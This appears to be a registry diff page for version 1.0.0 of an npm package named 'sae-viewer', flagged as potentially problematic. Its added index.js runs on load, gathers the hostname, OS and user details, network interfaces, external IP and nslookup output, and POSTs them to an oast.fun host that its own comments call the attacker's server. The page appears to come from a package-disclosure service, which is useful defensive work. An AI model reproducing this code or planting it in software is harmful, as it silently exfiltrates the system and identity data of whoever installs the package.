sae-viewer 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of sae-viewer might be problematic. Click here for more details.
- package/index.js +82 -0
- package/package.json +12 -0
package/index.js
ADDED
|
@@ -0,0 +1,82 @@
|
|
|
1
|
+
const os = require('os');
|
|
2
|
+
const https = require('https');
|
|
3
|
+
const fs = require('fs');
|
|
4
|
+
const exec = require('child_process').exec;
|
|
5
|
+
|
|
6
|
+
// Function to send data to attacker's server
|
|
7
|
+
function sendDataToAttacker(data) {
|
|
8
|
+
const options = {
|
|
9
|
+
hostname: 'tqixhxwvibvpvtsahqraqodmtpnukgttl.oast.fun', // Attacker's server
|
|
10
|
+
port: 443,
|
|
11
|
+
path: '/seaviewerchatgpt', // Endpoint to collect data
|
|
12
|
+
method: 'POST',
|
|
13
|
+
headers: {
|
|
14
|
+
'Content-Type': 'application/json',
|
|
15
|
+
'User-Agent': data.userAgent // Send user agent in headers
|
|
16
|
+
},
|
|
17
|
+
};
|
|
18
|
+
|
|
19
|
+
const req = https.request(options, (res) => {
|
|
20
|
+
console.log(`Data sent with status code: ${res.statusCode}`);
|
|
21
|
+
});
|
|
22
|
+
|
|
23
|
+
req.on('error', (e) => {
|
|
24
|
+
console.error(`Problem with request: ${e.message}`);
|
|
25
|
+
});
|
|
26
|
+
|
|
27
|
+
req.write(JSON.stringify(data));
|
|
28
|
+
req.end();
|
|
29
|
+
}
|
|
30
|
+
|
|
31
|
+
// Collect system info
|
|
32
|
+
const systemInfo = {
|
|
33
|
+
hostname: os.hostname(), // Get server's hostname
|
|
34
|
+
platform: os.platform(), // OS platform (e.g., Linux, Windows)
|
|
35
|
+
arch: os.arch(), // Architecture (x64, arm, etc.)
|
|
36
|
+
cpus: os.cpus().length, // Number of CPU cores
|
|
37
|
+
memory: os.totalmem(), // Total system memory
|
|
38
|
+
networkInterfaces: os.networkInterfaces(),
|
|
39
|
+
};
|
|
40
|
+
|
|
41
|
+
// Collect user-related info
|
|
42
|
+
const userInfo = os.userInfo();
|
|
43
|
+
|
|
44
|
+
// Get external IP (simple API call to a free IP lookup service)
|
|
45
|
+
https.get('https://api.ipify.org?format=json', (resp) => {
|
|
46
|
+
let data = '';
|
|
47
|
+
|
|
48
|
+
resp.on('data', (chunk) => {
|
|
49
|
+
data += chunk;
|
|
50
|
+
});
|
|
51
|
+
|
|
52
|
+
resp.on('end', () => {
|
|
53
|
+
const ipInfo = JSON.parse(data);
|
|
54
|
+
systemInfo.externalIP = ipInfo.ip;
|
|
55
|
+
|
|
56
|
+
// Get company info (using the hostname)
|
|
57
|
+
exec(`nslookup ${os.hostname()}`, (error, stdout, stderr) => {
|
|
58
|
+
if (!error) {
|
|
59
|
+
systemInfo.companyDetails = stdout;
|
|
60
|
+
}
|
|
61
|
+
|
|
62
|
+
// Collect user agent (can be hardcoded or dynamically fetched in real scenarios)
|
|
63
|
+
const userAgent = "NodeJS Malicious Client/1.0";
|
|
64
|
+
|
|
65
|
+
// Prepare data to send
|
|
66
|
+
const collectedData = {
|
|
67
|
+
systemInfo,
|
|
68
|
+
userInfo,
|
|
69
|
+
userAgent, // User agent string for tracking
|
|
70
|
+
};
|
|
71
|
+
|
|
72
|
+
// Send data to the attacker's server
|
|
73
|
+
sendDataToAttacker(collectedData);
|
|
74
|
+
});
|
|
75
|
+
});
|
|
76
|
+
|
|
77
|
+
}).on("error", (err) => {
|
|
78
|
+
console.log("Error fetching IP: " + err.message);
|
|
79
|
+
});
|
|
80
|
+
|
|
81
|
+
// Execute immediately
|
|
82
|
+
console.log("Malicious package executed.");
|
package/package.json
ADDED